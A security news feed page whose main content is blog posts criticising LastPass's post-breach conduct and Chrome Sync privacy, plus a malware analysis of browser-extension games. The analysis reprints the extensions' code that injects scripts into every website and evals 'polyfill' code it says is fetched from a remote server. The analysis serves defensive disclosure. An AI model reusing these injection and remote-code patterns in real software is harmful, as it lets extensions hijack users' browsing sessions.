feeds
by zer0x0ne

xkcd
Retrieved title: xkcd.com, 3 item(s)
Urban Planning Opinion Progression
xkcd Phone Flip
Haunted House
PortSwigger Research
Retrieved title: PortSwigger Research, 6 item(s)
Smashing the state machine: the true potential of web race conditions
For too long, web race condition attacks have focused on a tiny handful of scenarios. Their true potential has been masked thanks to tricky workflows, missing tooling, and simple network jitter hiding…
Exploiting XSS in hidden inputs and meta tags
In this post we are going to show how you can (ab)use the new HTML popup functionality in Chrome to exploit XSS in meta tags and hidden inputs. It all started when I noticed the new popover behaviour…
How I choose a security research topic
How do you choose what topic to research? That’s the single most common question I get asked, probably because selecting a topic is such a daunting prospect. In this post, I’ll take a personal look at…
Bypassing CSP via DOM clobbering
You might have found HTML injection, but unfortunately identified that the site is protected with CSP. All is not lost; it might be possible to bypass CSP using DOM clobbering, which you can now detect…
Ambushed by AngularJS: a hidden CSP bypass in Piwik PRO
Any individual website component can undermine the security of the entire site, and analytics platforms are no exception. With this in mind, we decided to do a quick audit of Piwik PRO to make sure it…
The curl quirk that exposed Burp Suite & Google Chrome
In this post, we'll explore a little-known feature in curl that led to a local-file disclosure vulnerability in both Burp Suite Pro, and Google Chrome. We patched Burp Suite a while back, but suspect…
Dark Reading
Retrieved title: Dark Reading, 6 item(s)
When It Comes to Email Security, The Cloud You Pick Matters
While cloud-based email offers more security than on-premises, insurance firms say it matters whether you use Microsoft 365 or Google Workspace.
Xenomorph Android Malware Targets Customers of 30 US Banks
The Trojan had mainly been infecting banks in Europe since it first surfaced more than one year ago.
MOVEit Flaw Leads to 900 University Data Breaches
National Student Clearinghouse, a nonprofit serving thousands of universities with enrollment services, exposes more than 900 schools within its MOVEit environment.
UAE-Linked 'Stealth Falcon' APT Mimics Microsoft in Homoglyph Attack
The cyberattackers are using the "Deadglyph" custom spyware, whose full capabilities have not yet been uncovered.
The Hot Seat: CISO Accountability in a New Era of SEC Regulation
Updated cybersecurity regulations herald a new era of transparency and accountability in the face of escalating industry vulnerabilities.
Cyber Hygiene: A First Line of Defense Against Evolving Cyberattacks
Back to basics is a good start, but too often security teams don't handle their deployment correctly. Here's how to avoid the common pitfalls.
Almost Secure
Retrieved title: Almost Secure, 3 item(s)
A year after the disastrous breach, LastPass has not improved
In September last year, a breach at LastPass’ parent company GoTo (formerly LogMeIn) culminated in attackers siphoning out all data from their servers. The criticism from the security community has been massive. This was not so much because of the breach itself (such things happen) but because of the many obvious ways in which LastPass made matters worse: taking months to notify users, failing to provide useful mitigation instructions, downplaying the severity of the attack, ignoring technical issues that had been publicized years earlier and made the attackers’ job much easier. The list goes on.
That was almost a year ago now. LastPass promised to improve, both in their communication and on the technical side of things. So let’s take a look at whether they managed to deliver.
TL;DR: They didn’t. So far I have failed to find evidence of any improvements whatsoever.

The communication
The initial advisory
LastPass’ initial communication around the breach has been nothing short of a disaster. It came more than three months after the users’ data was extracted from LastPass servers. Yet rather than taking responsibility and helping affected users, their PR statement was designed to downplay and shift blame. For example, it talked a lot about LastPass’ secure default settings but failed to mention that LastPass never really enforced those. In fact, people who created their accounts a while ago and used very outdated (insecure) settings never saw so much as a warning.
The statement concluded with “There are no recommended actions that you need to take at this time.” I called this phrase “gross negligence” back when I initially wrote about it, and I still stand by this assessment.
The detailed advisory
It took LastPass another two months of strict radio silence to publish a more detailed advisory. That’s where we finally learned some more about the breach. We also learned that business customers using Federated Login are very much affected by the breach; the previous advisory had explicitly denied that.
But even then, this was mentioned only indirectly, in recommendation 9 out of 10 for LastPass’ business customers. It seems that LastPass considered generic advice on protecting against phishing attacks more important than mitigation of their breach. And the recommendation didn’t actually say “You are in danger. Rotate K2 ASAP.” Instead, it said “If, based on your security posture or risk tolerance, you decide to rotate the K1 and K2 split knowledge components…” That’s the conclusion of a large pile of text essentially claiming that there is no risk.
At least the advisory for individual users got the priorities right. It was master password first, iterations count after that, and all the generic advice at the end.
Except: they still failed to admit the scope of the breach. The advice was:
Depending on the length and complexity of your master password and iteration count setting, you may want to reset your master password.
And this is just wrong. The breach already happened. Resetting the master password will help protect against future breaches, but it won’t help with the passwords already compromised. This advice should have really been:
Depending on the length and complexity of your master password and iteration count setting, you may want to reset all your passwords.
But this would amount to saying “we screwed up big time.” Which they definitely did. But they still wouldn’t admit it.
Improvements?
A blog post by the LastPass CEO Karim Toubba said:
I acknowledge our customers’ frustration with our inability to communicate more immediately, more clearly, and more comprehensively throughout this event. I accept the criticism and take full responsibility. We have learned a great deal and are committed to communicating more effectively going forward.
As I’ve outlined above, the detailed advisory published simultaneously with this blog post still left a lot to be desired. But this sounds like a commitment to improve. So has some better advice been published in the six months since then?
No, this doesn’t appear to be the case. Instead, the detailed advisory moved to the “Get Started – About LastPass” section of their support page. So it’s now considered generic advice for LastPass users. Any specific advice on mitigating the fallout of the breach, assuming that it isn’t too late already? There doesn’t seem to be any.
The LastPass blog has been publishing lots of articles again, often multiple per week. However, there doesn’t appear to be any useful information here at all, only PR. To add insult to injury, LastPass published an article in July titled “How Zero Knowledge Keeps Passwords Safe.” It gives a generic overview of zero knowledge which largely doesn’t apply to LastPass. It concludes with:
For example, zero-knowledge means that no one has access to your master password for LastPass or the data stored in your LastPass vault, except you (not even LastPass).
This is bullshit. That’s not how LastPass has been designed, and I wrote about it five years ago. Other people did as well. LastPass didn’t care, otherwise this breach wouldn’t have been such a disaster.
Secure settings
The issue
LastPass likes to boast about how their default settings are perfectly secure. But even assuming that this is true, what about the people who do not use their defaults? For example, the people who created their LastPass account a long time ago, back when the defaults were different?
The iterations count is particularly important. Few people have heard of it, hidden as it is under “Advanced Settings.” Yet when someone tries to decrypt your passwords, this value is an extremely important factor: a high value makes successful decryption much less likely.
As of 2023, the current default is 600,000 iterations. Before the breach, the default was 100,100 iterations, meaning passwords could be decrypted six times faster. Before 2018 it was 5,000 iterations, before 2013 it was 500, and before 2012 the default was a single iteration.
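To illustrate why this number matters, here is a minimal sketch of the kind of PBKDF2-based key derivation involved, written in browser JavaScript with the Web Crypto API. The function and parameter names are mine; this is not LastPass code, just the general scheme (PBKDF2-SHA256 with a configurable iterations count):
// Minimal illustrative sketch, not LastPass code: derive a vault encryption
// key from the master password with PBKDF2-SHA256. The iterations value is
// the work factor: every password guess an attacker makes costs this many
// hash computations.
async function deriveVaultKey(masterPassword, salt, iterations)
{
  const enc = new TextEncoder();
  const baseKey = await crypto.subtle.importKey(
    "raw", enc.encode(masterPassword), "PBKDF2", false, ["deriveBits"]);
  const bits = await crypto.subtle.deriveBits(
    { name: "PBKDF2", hash: "SHA-256", salt: enc.encode(salt), iterations },
    baseKey, 256);
  return new Uint8Array(bits);
}
// With iterations = 1 an attacker can test guesses at essentially raw hash
// speed; with 600,000 each guess is 600,000 times more expensive.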
What happened to all the accounts which were created with the old defaults? It appears that for most of these accounts, LastPass failed to fix the settings automatically. People didn’t even receive a warning. So when the breach happened, quite a few users reported having their accounts configured with 1 iteration, massively weakening the protection provided by the encryption.
It’s the same with the master password. In 2018 LastPass introduced much stricter master password rules, requiring at least 12 characters. While I don’t consider length-based criteria very effective to guide users towards secure passwords, LastPass failed to enforce even this rule for existing accounts. Quite a few people first learned about the new password complexity requirement when reading about the breach.
Improvements?
I originally asked LastPass about enforcing a secure iterations count setting for existing accounts in February 2018. LastPass kept stalling until I eventually published my research, without ever making certain that all users were secure. And they ignored this issue for another four years, until the breach happened.
And while the breach prompted LastPass to increase the default iterations count, they appear to be still ignoring existing accounts. I just logged into my test account and checked the settings:

There is no warning whatsoever. Only if I try to change this setting does a message pop up:
For your security, your master password iteration value must meet the LastPass minimum requirement: 600000
But people who are unaware of this setting will not be warned. And while LastPass definitely could update this setting automatically when people log in, they still choose not to do it for some reason.
It’s the same with the master password. The password of my test account is weak because this account was created years ago. If I try to change it, I will be forced to choose a password that is at least 12 characters long. But as long as I just keep using the same password, LastPass won’t force me to change it – even though it definitely could.
There isn’t even a definitive warning when I log in. There is only this notification in the menu:

Only after clicking “Security Dashboard” will a warning message show up:

If this is such a critical issue that I need to change my master password immediately, why won’t LastPass just tell me to do it when I log in?
This alert message apparently pre-dates the breach, so there don’t seem to be any improvements in this area either.
Unencrypted data
The issue
LastPass PR likes to use “secure vault” as a description of LastPass data storage. This implies that all data is secured (encrypted) and cannot be retrieved without the knowledge of the master password. But that’s not the case with LastPass.
LastPass encrypts passwords, user names and a few other pieces of data. Everything else is unencrypted, in particular website addresses and metadata. That’s a very bad idea, as security researchers kept pointing out again and again. In November 2015 (page 67). In January 2017. In July 2018. And there are probably more.
LastPass kept ignoring this issue. So when their data leaked last year, the attackers gained not only encrypted passwords but also plenty of plaintext data. LastPass was forced to admit this, but once again downplayed it by claiming that website addresses are not sensitive data. And users were rightfully outraged.
Improvements?
Today I logged into my LastPass account and then opened https://lastpass.com/getaccts.php. This gives you the XML representation of your LastPass data as it is stored on the server. And I fail to see any improvements compared to this data one year ago. I gave LastPass the benefit of the doubt and created a new account record. Still:
<account url="68747470733a2f2f746573742e6465" last_modified="1693940903" …>
The data in the url field is merely hex-encoded and can easily be translated back into https://test.de. And the last_modified field is a Unix timestamp, no encryption here either.
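Decoding it yourself takes a one-liner; a quick sketch in plain JavaScript (nothing LastPass-specific, the values are the ones shown above):
// Quick sketch: the "url" attribute is plain hex, not ciphertext.
const hex = "68747470733a2f2f746573742e6465";
const url = hex.match(/../g).map(b => String.fromCharCode(parseInt(b, 16))).join("");
console.log(url); // "https://test.de"
// The last_modified attribute is just a Unix timestamp:
console.log(new Date(1693940903 * 1000)); // early September 2023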
Conclusions
A year after the breach, LastPass still hasn’t provided their customers with useful instructions on mitigating it, nor have they admitted its full scope. They also failed to address any of the long-standing issues that security researchers have been warning about for years. At the time of writing, owners of older LastPass accounts still have to become active on their own in order to fix outdated security settings. And much of the LastPass data isn’t being encrypted.
I honestly cannot explain LastPass’ refusal to fix the security settings of existing accounts. Back when I was nagging them about it, they flat out lied to me. Do they not have any senior engineers on staff who could implement this change? Do they really not care, as long as they can blame the users for not updating their settings? Beats me.
As to not encrypting all the data, I am starting to suspect that LastPass actually wants visibility into your data. Do they need to know which websites you have accounts on in order to guide some business decisions? Or are they making additional income by selling this data? I don’t know, but LastPass persistently ignoring this issue makes me suspicious.
Either way, it seems that LastPass considers the matter of their breach closed. They published their advisory in March this year, and that’s it. Supposedly, they improved the security of their infrastructure, which nobody can verify of course. There is nothing else coming, no more communication and no technical improvements. Now they will only be publishing more lies about “zero knowledge architecture.”
Chrome Sync privacy is still very bad
Five years ago I wrote an article about the shortcomings of Chrome Sync (as well as a minor issue with Firefox Sync). Chrome Sync has seen many improvements since then, so the time seems right to revisit it and see whether it respects your privacy now.
Spoiler: No, it doesn’t. It improved, but that’s an improvement from outright horrible to merely very bad. The good news: today you can use Chrome Sync in a way that preserves your privacy. Google however isn’t interested in helping you figure out how to do it.
The default flow
Chrome Sync isn’t some obscure feature of Google Chrome. In fact, as of Chrome 116 setting up sync is part of the suggested setup when you first install the browser:

Clicking “Continue” will ask you to log into your Google account, after which you are prompted to turn on sync:

Did you click the suggested “Yes, I’m in” button here? Then you’ve already lost. You just allowed Chrome to upload your data to Google servers, without any encryption. Your passwords, browsing history, bookmarks, open tabs? They are no longer yours alone; you have allowed Google to access them. Didn’t you notice the “Google may personalize Search and other services based on your history” text in the prompt?
In case you have any doubts, this setting (which is off by default) gets turned on when you click “Yes, I’m in”:

Yes, Google is definitely watching over your shoulder now.
The privacy-preserving flow
Now there is a way for you to use Chrome Sync and keep your privacy. In the prompt above, you should have clicked “Settings.” Which would have given you this page:

Do you see what you need to do here before confirming? Anyone? Right, the “Make searches and browsing better” option has already been turned on and needs to be switched off. But that isn’t the main issue.
“Encryption options” is what you need to look into. Don’t trust the claim that Chrome is encrypting your data; expand this section.

That default option sounds sorta nice, right? What it means however is: “Whatever encryption there might be, we get to see your data whenever we want it. But you trust us not to peek, right?” The correct answer is “No” by the way, as Google is certain to monetize your browsing history at the very least. And even if you trust Google to do no evil, do you also trust your government? Because often enough Google will hand over your data to local authorities.
The right way to use Chrome Sync is to set up a passphrase here. This will make sure that most of your data is safely encrypted (payment data being a notable exception), so that neither Google nor anyone else with access to Google servers can read it.
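To be clear about what the passphrase buys you: the key is derived locally from the passphrase, and only ciphertext leaves your machine. A rough conceptual sketch in browser JavaScript with the Web Crypto API follows; this is not Chrome’s actual sync protocol, merely the general idea, and all names and parameters are mine:
// Rough conceptual sketch, not Chrome's implementation: derive a key from the
// sync passphrase locally and encrypt a record before upload.
async function encryptRecord(passphrase, saltBytes, plaintext)
{
  const enc = new TextEncoder();
  const baseKey = await crypto.subtle.importKey(
    "raw", enc.encode(passphrase), "PBKDF2", false, ["deriveKey"]);
  const key = await crypto.subtle.deriveKey(
    { name: "PBKDF2", hash: "SHA-256", salt: saltBytes, iterations: 600000 },
    baseKey, { name: "AES-GCM", length: 256 }, false, ["encrypt"]);
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const ciphertext = await crypto.subtle.encrypt(
    { name: "AES-GCM", iv }, key, enc.encode(plaintext));
  // Only iv + ciphertext are uploaded; without the passphrase the server
  // cannot decrypt them.
  return { iv, ciphertext: new Uint8Array(ciphertext) };
}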
What does Google do with your data?
Deep in Chrome’s privacy policy is a section called How Chrome handles your synced information. That’s where you get some hints towards how your data is being used. In particular:
If you don’t use your Chrome data to personalize your Google experience outside of Chrome, Google will only use your Chrome data after it’s anonymized and aggregated with data from other users.
So Google will use the data for personalization. But even if you opt out of this personalization, they will still use your “anonymized and aggregated” data. As seen before, promises to anonymize and aggregate data cannot necessarily be trusted. Even if Google is serious about this, proper anonymization is difficult to achieve.
So how do you make sure that Google doesn’t use your data at all?
If you would like to use Google’s cloud to store and sync your Chrome data but you don’t want Google to access the data, you can encrypt your synced Chrome data with your own sync passphrase.
Yes, sync passphrase it is. This phrase is the closest thing I could find to an endorsement of sync passphrases, hidden in a document that almost nobody reads.
This makes perfect sense of course. Google has no interest in helping you protect your data. They would rather have you share your data with them, so that Google can profit off it.
It could have been worse
Yes, it could have been worse. In fact, it was worse.
Chrome Sync used to enable immediately when you signed into Chrome, without any further action from you. It also used to upload your data unencrypted before you had a chance to change the settings. Besides, the sync passphrase would only result in passwords being encrypted and none of the other data. And there used to be a warning scaring people away from setting a sync passphrase because it wouldn’t allow Google to display your passwords online. And the encryption was horribly misimplemented.
If you look at it this way, there have been considerable improvements to Chrome Sync over the past five years. But it still doesn’t resemble a service meant to respect users’ privacy. That’s by design of course: Google really doesn’t want you to use effective protection for your data. That data is their profit.
Comparison to Firefox Sync
I suspect that people skimming my previous article on the topic took away from it something like “both Chrome Sync and Firefox Sync have issues, but Chrome fixed theirs.” Nothing could be further from the truth.
While Chrome did improve, they are still nowhere close to where Firefox Sync started off. Thing is: Firefox Sync was built with privacy in mind. It was encrypting all data from the very start, by default. Mozilla’s goal was never monetizing this data.
Google on the other hand built a sync service that allowed them to collect all of users’ data, with a tiny encryption shim on top of it. Outside pressure seems to have forced them to make Chrome Sync encryption actually usable. But they really don’t want you to use this, and their user interface design makes that very clear.
Given that, the Firefox Sync issue I pointed out is comparably minor. It isn’t great that five years weren’t enough to address it. This isn’t a reason to discourage people from using Firefox Sync however.
Why browser extension games need access to all websites
When installing browser extensions in Google Chrome, you are asked to confirm the extension’s permissions. In theory, this is supposed to allow assessing the risk associated with an extension. In reality however, users typically lack the knowledge to properly interpret this prompt. For example, I’ve often seen users accusing extension developers of spying just because the prompt says they could.

On the other hand, people will often accept these cryptic prompts without thinking twice. They expect the browser vendors to keep them out of harm’s way, a trust that isn’t always justified [1] [2] [3]. The most extreme scenario here is casual games that don’t interact with the web at all, yet request access to all websites. I found a number of extensions that will abuse this power to hijack websites.
The affected extensions
The extensions listed below belong to three independent groups. Each group is indicated in the “Issue” column and explained in more detail in a dedicated section below.
As the list of extension IDs is getting rather long, I created a repository where I list the IDs from all articles in this series. There is also a check-extensions utility available for download that will search local browser profiles for these extensions.
Extensions in Chrome Web Store:
Name | Weekly active users | Extension ID | Issue |
---|---|---|---|
2048 Classic Game | 486,569 | kgfeiebnfmmfpomhochmlfmdmjmfedfj | False pretenses |
Tetris Classic | 461,812 | pmlcjncilaaaemknfefmegedhcgelmee | False pretenses |
Doodle Jump original | 431,236 | ohdgnoepeabcfdkboidmaedenahioohf | Search hijacking |
Doodle Jump Classic Game | 274,688 | dnbipceilikdgjmeiagblfckeialaela | False pretenses |
Slope Unblocked Game | 99,949 | aciipkgmbljbcokcnhjbjdhilpngemnj | Search hijacking |
Drift Hunters Unblocked Game | 77,812 | nlmjpeojbncdmlfkpppngdnolhfgiehn | Search hijacking |
Vex 4 Unblocked game | 63,164 | phjhbkdgnjaokligmkimgnlagccanodn | Search hijacking |
Crossy Road Game unblocked | 9,511 | fkhpfgpmejefmjaeelgoopkcglgafedm | Search hijacking |
Run 3 Unblocked | 7,299 | mcmmiinopedfbaoongoclagidncaacbd | Search hijacking |
Extensions in Edge Add-ons store:
Name | Weekly active users | Extension ID | Issue |
---|---|---|---|
Slope Unblocked Game | 6,038 | ndcokkmfmiaecmndbpohaogmpmchfpkk | Code injection |
Drift Hunters Unblocked | 3,107 | cpmpjapeeidaikiiemnddfgfdfjjhgif | Code injection |
Tetris Classic | 2,052 | ajefbooiifdkmgkpjkanmgbjbndfbfhg | False pretenses |
False pretenses
Last week, I wrote about a cluster of browser extensions that systematically request excessive permissions, typically paired with attempts to make it look like these permissions are actually required. That article already lists several casual games among other extensions.
This isn’t the only large cluster in the Chrome Web Store however; there is at least one more. The 34 malicious extensions Google removed recently belonged to this cluster. I’m counting at least 50 more extensions in this cluster without obvious malicious functionality, including three casual games.
The extension “2048 Classic Game” and similar ones request access to all websites. They use this access to run a content script on all websites, with code like this:
let {quickAccess} = await chrome.storage.local.get("quickAccess");
if (quickAccess)
  displayButton();
function displayButton()
{
  document.addEventListener("DOMContentLoaded", async () => {
    if (!document.getElementById(`${ chrome.runtime.id }-img`))
    {
      document.body.insertAdjacentHTML("beforebegin", "…");
      document.getElementById(`${ chrome.runtime.id }-btn`)
        .addEventListener("click", () =>
        {
          chrome.runtime.sendMessage({ action: "viewPopup" });
        });
    }
  });
}
Yes, there is a race condition here: what if the storage.local.get() call is slow and finishes only after the DOMContentLoaded event has already fired? Also: yes, adding some HTML code to the beginning of every page is going to cause a massive mess. None of this is really a problem however, as this code isn’t actually meant to run. See, the quickAccess flag in storage.local is never set. It cannot be: these extensions don’t have a preferences page.
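As an aside, avoiding this race is trivial; a minimal sketch of how this is normally written (my own rewrite, not the extension’s code):
// Hypothetical race-free variant: check whether the document has already
// finished parsing instead of blindly waiting for DOMContentLoaded.
function onDomReady(callback)
{
  if (document.readyState !== "loading")
    callback();
  else
    document.addEventListener("DOMContentLoaded", callback);
}
// usage: onDomReady(displayButton);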
So this entire content script serves only as a pretense, making it look like the requested permissions are required when they are really not. At some point in the future these extensions are meant to be updated into malicious versions which will abuse these permissions.
Search hijacking
The “Vex 4 Unblocked game” and similar extensions actually contain their malicious code already. They also inject a content script into all web pages. First that content script makes sure to download “options” data from https://cloudenginesdk.com/api/v2/. It then injects a script from the extension into the page:
let script = document.createElement("script");
script.setAttribute("data-options", data);
script.setAttribute("src", chrome.runtime.getURL("js/options.js"));
script.onload = () => {
  document.documentElement.removeChild(script);
};
document.documentElement.appendChild(script);
What does the “options” data returned by cloudenginesdk[.]com look like? The usual response looks like this:
{
  "check": "sdk",
  "selector": ".game-area",
  "mask": "cloudenginesdk.com",
  "g": "game",
  "b": "beta",
  "debug": ""
}
Given the code in js/options.js, this data makes no sense. The mask field specifies which websites the code should run on, and this code clearly isn’t meant to run on cloudenginesdk.com, a website without any pages. So this is a decoy; the server will serve the actual malicious instructions at some point in the future.
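For illustration, a gate based on such a mask value typically looks something like the following. This is a hypothetical sketch, not the actual code from js/options.js; it only assumes the data-options attribute set by the injection code above:
// Hypothetical sketch: read the server-provided options from the injected
// script tag and only activate on hosts matching the "mask" value.
const options = JSON.parse(document.currentScript.getAttribute("data-options") || "{}");
if (options.mask && location.hostname.endsWith(options.mask))
{
  // placeholder for the search-manipulation logic
  console.log("would activate on", location.hostname);
}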
Without having seen those instructions, it’s still obvious that the code processing them is meant to run on search pages. The processing for Google search pages booby-traps search results: when a result link is clicked, this script will open a pop-up, sending you to some page that receives your search query as a parameter.
For Yahoo pages, this script will download some additional data containing selectors. Your clicks on one element are then redirected to another element. Presumably, the goal is making you click on ads (ad fraud).
That’s only the obvious part of the functionality however. In addition to that, this code will also inject additional scripts into web pages, presumably showing ads. It will send your search queries to some third party. And it has the capability of running arbitrary JavaScript on any web page.
So while this seems to be geared towards showing you additional search ads, the same functionality could hijack your online banking session for example.
Code injection
The malicious games in Microsoft’s Edge Add-ons store bear some similarity to the ones doing search hijacking. I cannot be certain that they are published by the same actor however; their functionality is far less sophisticated. The content script simply injects a “browser polyfill” script:
chrome.storage.local.get("polyfill", ({polyfill}) => {
  document.documentElement.setAttribute("data-polyfill", polyfill);
  let elem = document.createElement("script");
  elem.src = chrome.runtime.getURL("js/browser-polyfill.js");
  elem.onload = () => {
    document.documentElement.removeChild(elem);
  };
  document.documentElement.appendChild(elem);
});
And what does that “polyfill” script do? It runs the “polyfill” code:
const job = document.documentElement.getAttribute("data-polyfill");
document.documentElement.removeAttribute("data-polyfill");
job && eval(job);
So where does this “polyfill” code come from? The extension downloads it from https://polyfilljs.org/browser-polyfill.
For me, this download produces only an empty object. Presumably, it will only give out the malicious script to people who have been using the extension for a while. And that script will then be injected into each and every website you visit.